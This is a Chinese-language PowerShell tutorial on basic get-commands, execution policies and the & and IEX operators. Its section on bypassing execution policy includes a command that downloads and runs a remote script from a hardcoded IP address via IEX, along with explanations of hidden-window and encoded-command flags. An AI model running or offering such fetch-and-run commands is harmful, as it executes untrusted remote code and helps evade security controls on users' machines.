基本命令
我们先从最基本的命令入手,Windows Powershell命令中get类命令是很庞大的一个命令工具集合,而且get类命令也是Powershell中占比最大的。
1、Get-Alias
Get-Alias命令的功能是查看当前运行会话的别名;
打开powershell,输入get-al,tab键补全,回车
我们也可以查询指定命令的别名,如:
Get-Alias -name dir
2、Get-ExecutionPolicy(查看当前执行策)
powershell中输入Get-ExecutionPolicy
可以看见当前的执行策是受限制的,所以是不能够执行psl脚本的
我们试着运行一下psl脚本
通过重定向先生成一个MyScript.ps1
'"Hello,Powershell Script"' > MyScript.ps1
然后运行
Powershell一般初始化情况下都会禁止脚本执行。脚本能否执行取决于Powershell的执行策略。
只有管理员才有权限更改这个策略。非管理员会报错。
查看脚本执行策略,可以通过:
更改脚本执行策略,可以通过:
Set-ExecutionPolicy Unrestricted
脚本执行策略类型为:Microsoft.PowerShell.ExecutionPolicy
查看所有支持的执行策略:
[System.Enum]::GetNames([Microsoft.PowerShell.ExecutionPolicy])
Unrestricted:权限最高,可以不受限制执行任何脚本。
Default:为Powershell默认的策略:Restricted,不允许任何脚本执行。
AllSigned:所有脚本都必须经过签名才能在运行。
RemoteSigned:本地脚本无限制,但是对来自网络的脚本必须经过签名。
Bypass:Bypass执行策略对脚本的执行不设任何的限制,任何脚本都可以执行,并且不会有安全性提示。
Undefined:Undefined表示没有设置脚本策略,当然此时发生会继承或应用默认的脚本策略。
当设置好执行策略后就可运行powershell脚本
如何绕过执行策略:
1.本地读取然后通过管道符运行
powershell Get-Content 1.ps1 | powershell -NoProfile -
2.远程下载并通过IEX运行脚本
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://47.94.80.129/ps/a.ps1')"
3.Bypass执行策略绕过
powershell -ExecutionPolicy bypass -File ./a.ps1
不会显示警告和提示
4.Unrestricted执行策略标志
powershell -ExecutionPolicy unrestricted -File ./a.ps1
当运行一个从网上下载的未签名的脚本时,会给出权限提示
需要解释的是:
Invoke-Expression(IEX的别名):用来把字符串当作命令执行。
WindowStyle Hidden(-w Hidden):隐藏窗口
Nonlnteractive(-NonI):非交互模式,PowerShell不为用户提供交互的提示。
NoProfile(-NoP):PowerShell控制台不加载当前用户的配置文件。
Noexit(-Noe):执行后不退出Shell。
EncodedCommand(-enc): 接受base64 encode的字符串编码,避免一些解析问题
3、&和IEX()
&:在字符串前加上&,可以把字符串当成命令执行在字符串前加上&,可以把字符串当成命令执行。
相同的命令还有IEX(Invoke-Expression),也是将字符串当作powershell执行
4、Get-FileHash(获取文件hash)
powershell定义函数方式:
function FuncName(args[])
{
code;
}
编辑器:
win10自带的ISE就挺不错,自动补全功能也很好。
